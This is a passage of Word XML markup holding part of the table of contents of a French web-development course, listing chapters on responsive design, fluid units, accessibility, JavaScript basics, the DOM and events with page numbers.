      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>204</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>21.3 Choisir ses points de rupture</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>205</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>21.4 Composants intrinsèquement adaptatifs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>205</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>21.5 Images et médias adaptatifs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>206</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>21.6 Tester dans des conditions réelles</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>207</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>22. Unités fluides et rythme vertical</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>211</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>22.1 Trois fonctions de bornage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>211</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>22.2 Construire une échelle fluide</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>212</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>22.3 Rythme vertical</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>212</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>22.4 Unités imbriquées et pièges</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>213</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>22.5 Vérifier les états intermédiaires</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>213</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>23. Accessibilité web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>218</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>23.1 Quatre principes, un cadre</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>218</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>23.2 Le HTML d'abord</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>219</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>23.3 Navigation au clavier</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>219</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>23.4 Formulaires et messages</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>220</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>23.5 Images, médias et contenus complexes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>220</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>23.6 Prioriser les corrections</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>221</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Partie IV — JavaScript et interactivité</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>24. Introduction à JavaScript</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>226</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>24.1 Où s'exécute JavaScript</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>227</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>24.2 Inclure un script dans une page</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>227</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>24.3 La console, un outil de travail</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>228</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>24.4 Variables et portée</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>228</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>24.5 Types et conversions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>229</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>24.6 Mode strict</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>230</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>25. Fonctions, tableaux et objets</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>234</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>25.1 Fonctions : déclaration, expression, flèche</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>234</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>25.2 Tableaux : transformer plutôt que boucler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>235</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>25.3 Objets et déstructuration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>236</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">25.4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> et fonctions fléchées</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>236</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>25.5 Immutabilité et effets de bord</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>237</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>26. Le DOM et la manipulation de la page</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>241</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>26.1 Le DOM n'est pas votre HTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>241</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>26.2 Sélectionner</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>242</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>26.3 Créer et insérer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>242</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>26.4 Classes, attributs et styles</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>243</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>26.5 Supprimer et déplacer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>244</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>26.6 Performance des manipulations</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>244</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>27. Événements et interaction</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>250</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>27.1 Écouter un événement</w:t>
      </w:r>
